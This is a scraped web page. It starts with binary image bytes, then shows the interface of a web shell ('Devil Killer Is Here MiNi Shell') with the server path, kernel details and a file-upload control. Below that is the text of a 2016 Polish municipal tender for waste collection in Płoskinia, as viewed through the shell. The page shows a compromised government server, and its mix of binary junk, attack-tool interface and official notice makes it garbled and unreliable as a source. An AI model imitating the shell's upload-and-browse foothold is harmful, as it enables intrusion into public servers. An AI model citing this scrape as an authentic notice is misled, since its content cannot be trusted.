JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161128/352795-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://ploskinia-ug.bip-wm.pl' target='_blank'>http://ploskinia-ug.bip-wm.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 352795 - 2016
              z dnia 2016-11-28 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Płoskinia: Odbiór odpadów komunalnych od właścicieli nieruchomości z terenu gminy Płoskinia w 2017 roku<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina  Płoskinia, krajowy numer identyfikacyjny
              54600600000, ul.
              Płoskinia 
              8,
              14526  
              Płoskinia, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              556 208 600, e-mail
              , faks
              0-55 620 8602.
              <br />
              Adres strony internetowej (URL): http://ploskinia-ug.bip-wm.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://ploskinia-ug.bip-wm.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://ploskinia-ug.bip-wm.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />W formie pisemnej, za pośrednictwem operatora pocztowego w rozumieniu ust awy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca <br />
                Adres:
                <br />Urząd Gminy Płoskinia, Płoskinia 8, 14-526 Płoskinia</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór odpadów komunalnych od właścicieli nieruchomości z terenu gminy Płoskinia w 2017 roku<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiotem zamówienia jest; świadczenie kompleksowej usługi polegającej na odbiorze odpadów komunalnych od właścicieli nieruchomości na terenie gminy Płoskinia, powstających w nieruchomościach zamieszkałych oraz niezamieszkałych terenu gminy Płoskinia oraz ich transport do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych znajdującej się w Regionie Północnym tj. do Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu ul. Mazurska 42, lub za pośrednictwem stacji przeładunkowej odpadów komunalnych w Braniewie przy                    ul. Stefczyka.
2. Wykonawca w ramach wykonania przedmiotu zamówienia będzie realizował: 
1) odbiór odpadów komunalnych od właścicieli nieruchomości, powstających na nieruchomościach zamieszkałych oraz niezamieszkałych z terenu Gminy Płoskinia  oraz transport do stacji odbioru następujących rodzajów odpadów: 
       a) odpady komunalne niesegregowane (zmieszane),
       b) odpady komunalne selektywnie zbierane   z punktów segregacji 
       c) meble i odpady wielkogabarytowe zużyty sprzęt RTV i AGD,
       d) przeterminowane leki, zużyte baterie i akumulatory,
       e) zużyte opony, odpady budowlane, rozbiórkowe i remontowe, chemikalia,
       f) odpady zielone.
2) opróżnianie koszy ulicznych na terenach wiejskich w tym ustawionych na boiskach, placach zabaw, świetlicach wiejskich i przystankach autobusowych znajdujących się bezpośrednio przy trasie przejazdu śmieciarki.
3) Wykonawca zobowiązany jest do: 
a)	zapewniania   możliwość  zakupu lub dzierżawy  pojemników dla właścicieli nieruchomości, na ich koszt  dotyczy nieruchomości niewyposażonych w pojemniki;
b)	dostarczy pojemniki o pojemności 1100 l. do selektywnej zbiórki odpadów do tzw. punktów segregacji znajdujących się w miejscowościach  zgodnie z wykazem po trzy pojemniki /tzw. zestaw/- na szkło, plastik, papier i tektura: 
Płoskinia  2 zestawy + 3 dodatkowe pojemniki na plastik,
Dąbrowa- 1 zestaw,
Chruściel  2 zestawy + 2 dodatkowe pojemniki na plastik,
Piórkowo -1 zestaw,
Zaporowo  1 zestaw,
Pierzchały  2 zestaw,
Czosnowo- 1 zestaw,
Lubnowo- 1 zestaw,
Tolkowiec  1 zestaw,	
Jarzębiec  1 zestaw + 1 dodatkowy na plastik,
Wysoka Braniewska  2 zestawy,
Długobór  2 zestawy + 1 dodatkowy na plastik,
Łozy  1 zestaw,
Stygajny  1 zestaw,
Robuzy- 1 zestaw,
Strubno  2 zestawy,
Podlechy -1 zestaw.
RAZEM  22 zestawy i 7 dodatkowych pojemników na plastik.
c)	odbioru odpadów z cmentarzy położonych na ternie gminy Płoskinia (miejscowości Chruściel, Pierzchały, Płoskinia, Tolkowiec, Długobór) w dniu 31.10.2017r. oraz w dniu 03.11.2017r.
d)	organizacja i obsługa Punktu Selektywnej Zbiórki Odpadów Komunalnych w Płoskini tzw. PSZOK na terenie Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej w Płoskini Sp. z o.o. W PSZOK-u przyjmowane będą nieodpłatnie niżej wymienione odpady zbierane w sposób selektywny z nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Płoskinia;  
- meble i inne odpady wielkogabarytowe,
- zużyte opony,
- zużyte baterie i akumulatory (inne niż przemysłowe i samochodowe),
- zużyty sprzęt elektryczny i elektroniczny,
            - przeterminowane leki, strzykawki, chemikalia,
            - odpady budowlane, rozbiórkowe i remontowe (pochodzące z drobnych 
              remontów nie wymagających zgłoszenia lub pozwolenia na budowę),   
            - odpady zielone.
           PSZOK będzie przyjmował w/w odpady raz w miesiącu w terminie ustalonym z 
           Wykonawcą usługi.
e)	dostarczy pojemniki na przeterminowane leki, zużyte baterie - miejsce do ustawienia pojemników; przeterminowane leki  - Ośrodek Zdrowia w Płoskini, zużyte baterie - w budynkach użyteczności publicznej  ok. 4 sztuk /na zamówienie Zlecającego/,
f)	odbiór odpadów wielkogabarytowych wystawka dwa razy w rok.

Szczegółowe rozmieszczenie pojemników oraz kontenerów ustalone zostanie z Wykonawcą usługi.

4) Częstotliwość wywozu odpadów:
a)	niesegregowane  raz na 2 tygodnie;
b)	segregowane  zgodnie z ustalonym harmonogramem (wg potrzeb w trakcie realizacji umowy- szacunkowo raz na 2 tygodnie). Odbiór odpadów segregowanych powinien odbywać się zgodnie z harmonogramem wykonanym przez Wykonawcę. Harmonogram winien być uzgodniony i zaakceptowany przez Zamawiającego; 
c)	odbiór przedmiotów wielkogabarytowych, sprzętu elektrycznego i elektronicznego wystawka dwa razy do roku.  Odbiór odpadów powinien odbywać się zgodnie z harmonogramem wykonanym przez Wykonawcę. Harmonogram winien być uzgodniony  i zaakceptowany przez Zamawiającego;
d)	odbiór pozostałych odpadów  w zależności od nagromadzenia, ustalone z Wykonawcą usługi.

5) Wykonawca zobowiązany jest do prowadzenia dokumentacji związanej z przedmiotem zamówienia oraz składanie sprawozdań zgodnie z obowiązującymi przepisami  forma papierowa i elektroniczna.

6 )Wykonawca jest obowiązany do odbioru i transportu odpadów komunalnych, również w przypadkach, kiedy dojazd do punktów odbioru odpadów komunalnych z nieruchomości będzie znacznie utrudniony.

7)Wykonawca zobowiązany jest w trakcie realizacji umowy do objęcia systemem odbioru wszystkich nowych nieruchomości zgłaszanych przez Zamawiającego. W trakcie realizacji zamówienia liczba nieruchomości zamieszkałych oraz nieruchomości niezamieszkałych może się zmienić.

8) Wykonawca prowadzi kontrolę odbieranych odpadów, przed zakwalifikowaniem odpadów segregowanych do zmieszanych w wypadku niedopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, sporządza na tą okoliczność dokumentację (np. notatkę, dokumentację fotograficzną) i przekazuje Zamawiającemu.

9) Pojazdy przeznaczone do realizacji zamówienia muszą:
a) zostać trwale i czytelnie oznakowane w trakcie realizacji odbioru i transportu odpadów 
    poprzez umieszczenie w widocznym miejscu tabliczki z napisem Gmina Płoskinia,
b) spełniać wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r. poz.122) w zakresie wyposażenia i wymagań technicznych umożliwiających odbieranie odpadów komunalnych od właścicieli nieruchomości oraz utrzymania odpowiedniego stanu sanitarnego pojazdów.
		
3. Charakterystyka Gminy Płoskinia
Ilość odpadów jaka powstała na terenie gminy w okresie realizacji umowy 12 miesięcy w 2015r:
- niesegregowane, zmieszane odpady komunalne w ilości 302,9 Mg o kodzie  200301;
- papier pochodzący z selektywnej zbiórki w ilości 7,8 Mg o kodzie 200101;
- szkło pochodzące z selektywnej zbiórki w ilości 16,5 Mg o kodzie 200102;
- tworzywa sztuczne z selektywnej zbiórki w ilości 13,4 Mg o kodzie 200139;
- odpady wielkogabarytowe w ilości 1,2 Mg o kodzie 200307;
- odpady inne niż niebezpieczne w ilości 0,9 Mg o kodzie 200136;
- zużyte opony w ilości 0,9 Mg o kodzie 160103.

Ilość odpadów jaka powstała na terenie gminy w okresie realizacji umowy od stycznia do października 2016r.:
- niesegregowane, zmieszane odpady komunalne w ilości 286,58 Mg o kodzie  200301;
- papier pochodzący z selektywnej zbiórki w ilości 7.6 Mg o kodzie 200101;
- szkło pochodzące z selektywnej zbiórki w ilości 12,96 Mg o kodzie 200102;
- tworzywa sztuczne z selektywnej zbiórki w ilości 14.34 Mg o kodzie 200139;
- odpady wielkogabarytowe w ilości 4,72 Mg o kodzie 200307;
- odpady inne niż niebezpieczne w ilości 0,56 Mg o kodzie 200136;
- zużyte opony w ilości 0,08 Mg o kodzie 160103;
- odpady  budowlane w ilości 1,66 MG.
Ilość podanych odpadów w ciągu okresu realizacji zamówienia może wzrosnąć lub zmaleć i jest zależna od złożonych deklaracji przez właścicieli nieruchomości.
a)	Liczba mieszkańców gminy według ewidencji ludności stan na 01.11.2016r. wynosi: 2 650 osób.
b)	Powierzchnia gminy; 17 205 ha.
c)	Przewidywana ilość nieruchomości do obsługi (dane na podstawie złożonych deklaracji);
- nieruchomości zamieszkałe (gospodarstwa  domowe) 638, 
- nieruchomości niezamieszkałe; 27.
      d) Większość nieruchomości to zabudowa jednorodzinna, budynki wielorodzinne; 6 sztuk   
           (powyżej 7 rodzin).	
e)	Liczba miejscowości na ternie gminy; 24  Chruściel, Czosnowo, Dąbrowa, Demity, Długobór, Giedyle, Jarzębiec, Lubnowo, Łojewo, Łozy, Pielgrzymowo, Pierławki, Pierzchały, Piórkowo, Płoskinia, Płoskinia Kolonia, Podlechy, Robuzy, Strubno, Stygajny, Szalmia, Tolkowiec, Trąbki, Wysoka Braniewska.  

4. Zatrudnienie osób na umowę o pracę;
1)	Zgodnie z art. 29 ust. 3a ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy(Dz. U. z 2016 r., poz. 1666, z późn. zm.). Wymóg ten dotyczy osób, które wykonywać będą bezpośrednio czynności związane z wykonywaniem usługi.
2)	Zatrudnienie osób, o których mowa powyżej udokumentowane zostanie oświadczeniem Wykonawcy. Wykonawca na żądanie Zamawiającego w ciągu 2 dni musi przedłożyć Zamawiającemu oświadczenie potwierdzające zatrudnienie przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności wskazanych przez Zamawiającego przy realizacji przedmiotowego zamówienia. Za niespełnienie przez Wykonawcę lub podwykonawcę przedmiotowych wymagań Zamawiający naliczy niżej podane kary umowne:
a)	500,00 zł za każdą osobę, która wykonuje czynności przy realizacji przedmiotowego zamówienia, a nie jest zatrudniona na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę,
b)	500,00 zł za każdy dzień opóźnienia w przedstawieniu Zamawiającemu na żądanie oświadczenia potwierdzającego zatrudnienie przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wskazanych przez Zamawiającego.

Uwaga: 
1.	Przed sporządzeniem oferty Wykonawca usługi powinien zapoznać się ze stanem dróg i rozmieszczeniem nieruchomości na terenie Gminy Płoskinia.
2.	Zamawiający przedstawił ilości odbieranych odpadów komunalnych w latach poprzednich w celu umożliwienia orientacyjnego oszacowania ilości odpadów w całym okresie realizacji zamówienia. Wykonawcy nie służą roszczenia w związku z realizacją zamówienia w zakresie ilości odpadów komunalnych mających zostać odebranych i  przetransportowanych z terenu gminy Płoskinia w okresie realizacji niniejszego przedmiotu zmówienia.
<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90511000-2,
                90513100-7,
                90512000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1) Zezwolenie na transport odpadów w zakresie objętym przedmiotem niniejszego zamówienia zgodnie z obowiązującymi przepisami prawa; 2) Wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Płoskinia, prowadzonego na podstawie art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2016r. poz. 250 ze zm.)<br />
                Informacje dodatkowe
                
Ocena spełnienia warunków udziału w postępowaniu  oraz podstaw wykluczenia Wykonawcy z postępowania będzie dokonywana na zasadzie spełnia/nie spełnia, w oparciu o złożone przez Wykonawców oświadczenia i dokumenty opisane w punkcie VIII.
<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego  warunku<br />
                Informacje dodatkowe
                
Ocena spełnienia warunków udziału w postępowaniu  oraz podstaw wykluczenia Wykonawcy z postępowania będzie dokonywana na zasadzie spełnia/nie spełnia, w oparciu o złożone przez Wykonawców oświadczenia i dokumenty opisane w punkcie VIII.
<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek udziału w postępowaniu  jeżeli wykaże że: 
a)będzie posiadać wiedzę i doświadczenie zawodowe umożliwiające wykonanie przedmiotu zamówienia tj., że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie,  w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  
- wykonał min. jedną usługę  odbioru  odpadów komunalnych z terenu   
  nieruchomości  i ich  transport w ilości co najmniej 300 Mg.
b)będzie posiadał zdolności techniczne  umożliwiające wykonanie przedmiotu zamówienia tj., dysponuje lub będzie dysponować samochodami specjalistycznymi i samochodem ciężarowym, spełniającymi wymagania techniczne określone przepisami ustawy prawo o ruchu drogowym oraz innymi przepisami szczególnymi, w ilości (minimum):
 -  dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, 
 -  dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów  
    komunalnych, 
 - jeden pojazd do odbierania odpadów bez funkcji kompaktującej.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                
Ocena spełnienia warunków udziału w postępowaniu  oraz podstaw wykluczenia Wykonawcy z postępowania będzie dokonywana na zasadzie spełnia/nie spełnia, w oparciu o złożone przez Wykonawców oświadczenia i dokumenty opisane w punkcie VIII.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy, 
2. Dokument potwierdzający wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie gminy Płoskinia, prowadzonego przez Wójta Gminy Płoskinia na podstawie art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2016r. poz. 250 ze zm.), dotyczący odpadów będących przedmiotem niniejszego zamówienia; 
3.Decyzję administracyjną - zezwolenie na transport odpadów w zakresie objętym przedmiotem niniejszego zamówienia zgodnie z obowiązującymi przepisami prawa; 
